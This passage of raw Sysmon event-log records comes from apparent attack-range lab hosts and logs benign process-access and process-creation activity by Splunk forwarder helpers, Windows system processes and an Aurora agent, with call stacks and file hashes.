Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000044982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:33.020{FE4C2B44-E53D-63C7-6806-00000000AF02}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.946{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D2E77956B7C7AE116B523042083647,SHA256=BB4E73A33A4F72C35367A74805A2C6508F2721F0884CB20293373500FEDDDA02,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.840{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.835{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000017509Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E53E-63C7-1E02-00000000B002}740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017508Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017507Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017506Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017505Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017504Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017503Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017502Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017501Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017500Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017499Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E53E-63C7-1E02-00000000B002}740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017498Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.261{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E53E-63C7-1E02-00000000B002}740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017497Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.263{E5A8D418-E53E-63C7-1E02-00000000B002}740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017496Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:34.019{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E32751BD5F4DCCBFC90C1AD007B53C8F,SHA256=4F7A753D4E8D7D7BF842FD9005814022C7905D6C451F0A74A6C0E664E2C5DA23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000045023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:34.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program 